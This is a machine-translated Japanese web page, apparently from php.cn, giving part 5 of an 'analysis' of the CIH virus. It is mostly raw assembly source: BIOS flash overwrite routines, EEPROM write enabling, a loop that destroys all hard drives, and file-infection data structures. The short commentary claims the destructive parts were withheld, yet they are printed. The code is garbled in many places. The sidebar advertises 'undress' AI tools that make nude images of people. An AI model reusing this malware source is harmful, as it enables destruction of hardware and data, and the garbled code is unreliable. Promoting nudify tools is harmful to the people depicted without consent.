ホームページ バックエンド開発 PHPチュートリアル ウイルスプログラムのソースコード例の解析 - CIH ウイルス[5]

ウイルスプログラムのソースコード例の解析 - CIH ウイルス[5]

Jan 17, 2017 am 11:21 AM

ウイルスプログラムのソースコード例の分析 - CIHウイルス[5]

push ecx
loop $

; BIOS 内の追加の 000E0000 ~ 000E007F セグメント ROM データ、合計 80h バイトを破棄します
xor ah, ah
mov [eax], al

xchg ecx, eax
ループ$

; BIOS の 000E0000 ~ 000FFFFF セグメント データを表示およびアクティブ化します。このセグメントには、合計 128 KB の情報を書き込むことができます。 mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h

loop $

; BIOSの000FE000~000FE07Fセグメントデータ、合計80hバイトを破棄
mov ah, 0e0h
mov [eax], al

; BIOSの000F0000~000FFFFFセグメントを隠す、合計64 KB
mov word ptr (BooleanCalculateCode-@ 10)[esi], 100ch
call esi

; すべてのハードドライブを破壊する
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp、2ch
push 0c0001000h
mov bh, 08h
push ebx
push Push ecx
;破壊のためのループ
LoopOfKillHardDisk:
int 20h
dd 00100004h

cmp word ptr [esi +06h], 0017h
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [ esi+ 10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber

jmp LoopOfKillHardDisk

;EEPROM への情報の書き込みを有効にする
EnableEEPROMToWrite:
mov [eax], cl
m ov [ ecx]、al
mov byte ptr [ eax], 80h
mov [eax], cl
mov [ecx], al

ret

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
edx, ebp
d x, eax

xchg eax , edi


xchg eax, edi
xchg edx, ebp
out dx, al

ret

;静的データ定義
LastVxdCallAddress = IFSMgr_Ring0_FileIO;最後に呼び出されたVxd命令アドレス
VxdCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath; 各Vxd呼び出し命令アドレス差分

VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ; d コール番号
VxdCallTableSize = ($-VxdCallIDTable)/04h ; プログラム内で使用される Vxd コールの数
;
;ウイルスのバージョンと著作権情報の定義
VirusVersionCopyright db ' CIH v' ; CIH ウイルスの識別
db MajorVirusVersion+'0' ; db MajorVirusVersion+'0' ; ; 作者名

; ウイルスサイズ
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections*SizeOfVirusCodeSectionTable(04h)

;動的データ定義
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ;ウイルスデータの開始address

OnBusy db 0 ;「ビジー」フラグ
FileModificationTime dd ? ;ファイル変更時刻

FileNameBuffer db FileNameBufferSize dup(?) ;7fh 長いファイル名バッファ
@7 = FileNameBuffer

DataBuffer = $
@8 = DataBuffer
NumberOfSections d w ?; ブロック数
TimeDateStamp dd ?; シンボルテーブル内のシンボル数
SIZEOFOPTIONALHEADER DW?; コネクタのバージョン番号
SizeOfCode dd ? ; コードセグメントサイズ
SizeOfInitializedData dd ? ; 初期化データブロックサイズ
ImageBase dd ? ; ロードベースアドレス

@9 = $
SectionAlignment dd ?メントディ? dd ? ; ユーザー定義のバージョン番号
SubsystemVersion dd ? ; 予約済み
SizeOfHeaders dd ? NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite ?

StartOfSectionTable = @9
SectionName = StartOfSectionTable ; ブロック名
VirtualSize = StartOfSectionTable+08h ; セクションの実長
VirtualAddress = StartOfSectionTable+0ch ; ブロックのRVA
SizeOfRawData = StartOfSectionTable+10h ; ブロックの物理長
PointerToRaw;データ = StartOfSectionTable+14h ;物理オフセット
PointerToRelocations = StartOfSectionTable+18h ; 再配置オフセット
PointerToLineNumbers = StartOfSectionTable+20h ; 再配置項目数
NumberOfSectionTable +22h ;
特性 = StartOfSectionTable +24h; ブロック属性
SizeOfScetionTable = Characteristics+04h-SectionName; 各ブロックテーブル項目の長さ

; ウイルスが必要とするメモリ量
VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9
; fセクション(? ?)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; SectionTable(04h)

;ウイルスプログラム END
VirusGame ENDS
END FileHeader
上記のコード分析プロセスから、CIH ウイルスには明確な構造と明確な層。このウイルス プログラムのバックボーン構造は DOS ウイルスと非常に似ていますが、ウイルスの詳細が win95 メソッドに従って処理され、すべてのシステム コールが Vxd を使用して行われる点が異なります。これにより、Windows で API 関数を使用する場合と比較して、ウイルス プログラムがより低レベルで効率的になり、プログラミングが容易になります。また、割り込みを使用する場合と比較して、ウイルス自体の複雑な再配置プロセスを考慮する必要がなく、より効果的にウイルスを防ぐことができます。プログラムの追跡を分析します。

CIHウイルスには2つの工夫があり、1つはウイルス感染時に感染ファイルのブロック間の空白領域を探し、そこにウイルス自身のさまざまなデータ構造やコードを書き込むことです(空白領域が十分でない場合)。これは、一部のファイルが感染しない理由の 1 つです)。次に、ウイルスが攻撃すると、フラッシュ メモリが焼き付けられるだけでなく、コンピュータのハードウェアに損傷を与える可能性があります。 、ハードディスクも破壊します。

セキュリティ上の理由から、ウイルス攻撃を引き起こし、ハードウェアに損害を与えるコード部分の詳細な分析は行っていません。




上記は、ウイルス プログラムのソース コード例分析 - CIH ウイルス [5] の内容です。その他の関連コンテンツについては、PHP 中国語 Web サイト (www.php.cn) に注目してください。



このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

Video Face Swap

Video Face Swap

完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

セッションのハイジャックはどのように機能し、どのようにPHPでそれを軽減できますか? セッションのハイジャックはどのように機能し、どのようにPHPでそれを軽減できますか? Apr 06, 2025 am 12:02 AM

セッションハイジャックは、次の手順で達成できます。1。セッションIDを取得します。2。セッションIDを使用します。3。セッションをアクティブに保ちます。 PHPでのセッションハイジャックを防ぐための方法には次のものが含まれます。1。セッション_regenerate_id()関数を使用して、セッションIDを再生します。2。データベースを介してストアセッションデータを3。

JSON Web Tokens(JWT)とPHP APIでのユースケースを説明してください。 JSON Web Tokens(JWT)とPHP APIでのユースケースを説明してください。 Apr 05, 2025 am 12:04 AM

JWTは、JSONに基づくオープン標準であり、主にアイデンティティ認証と情報交換のために、当事者間で情報を安全に送信するために使用されます。 1。JWTは、ヘッダー、ペイロード、署名の3つの部分で構成されています。 2。JWTの実用的な原則には、JWTの生成、JWTの検証、ペイロードの解析という3つのステップが含まれます。 3. PHPでの認証にJWTを使用する場合、JWTを生成および検証でき、ユーザーの役割と許可情報を高度な使用に含めることができます。 4.一般的なエラーには、署名検証障害、トークンの有効期限、およびペイロードが大きくなります。デバッグスキルには、デバッグツールの使用とロギングが含まれます。 5.パフォーマンスの最適化とベストプラクティスには、適切な署名アルゴリズムの使用、有効期間を合理的に設定することが含まれます。

確固たる原則と、それらがPHP開発にどのように適用されるかを説明してください。 確固たる原則と、それらがPHP開発にどのように適用されるかを説明してください。 Apr 03, 2025 am 12:04 AM

PHP開発における固体原理の適用には、次のものが含まれます。1。単一責任原則(SRP):各クラスは1つの機能のみを担当します。 2。オープンおよびクローズ原理(OCP):変更は、変更ではなく拡張によって達成されます。 3。Lischの代替原則(LSP):サブクラスは、プログラムの精度に影響を与えることなく、基本クラスを置き換えることができます。 4。インターフェイス分離原理(ISP):依存関係や未使用の方法を避けるために、細粒インターフェイスを使用します。 5。依存関係の反転原理(DIP):高レベルのモジュールと低レベルのモジュールは抽象化に依存し、依存関係噴射を通じて実装されます。

phpstormでCLIモードをデバッグする方法は? phpstormでCLIモードをデバッグする方法は? Apr 01, 2025 pm 02:57 PM

phpstormでCLIモードをデバッグする方法は? PHPStormで開発するときは、PHPをコマンドラインインターフェイス(CLI)モードでデバッグする必要がある場合があります。

システムの再起動後にUnixSocketの権限を自動的に設定する方法は? システムの再起動後にUnixSocketの権限を自動的に設定する方法は? Mar 31, 2025 pm 11:54 PM

システムが再起動した後、UnixSocketの権限を自動的に設定する方法。システムが再起動するたびに、UnixSocketの許可を変更するために次のコマンドを実行する必要があります:sudo ...

PHPでの後期静的結合を説明します(静的::)。 PHPでの後期静的結合を説明します(静的::)。 Apr 03, 2025 am 12:04 AM

静的結合(静的::) PHPで後期静的結合(LSB)を実装し、クラスを定義するのではなく、静的コンテキストで呼び出しクラスを参照できるようにします。 1)解析プロセスは実行時に実行されます。2)継承関係のコールクラスを検索します。3)パフォーマンスオーバーヘッドをもたらす可能性があります。

PHPのCurlライブラリを使用してJSONデータを含むPOSTリクエストを送信する方法は? PHPのCurlライブラリを使用してJSONデータを含むPOSTリクエストを送信する方法は? Apr 01, 2025 pm 03:12 PM

PHP開発でPHPのCurlライブラリを使用してJSONデータを送信すると、外部APIと対話する必要があることがよくあります。一般的な方法の1つは、Curlライブラリを使用して投稿を送信することです。

See all articles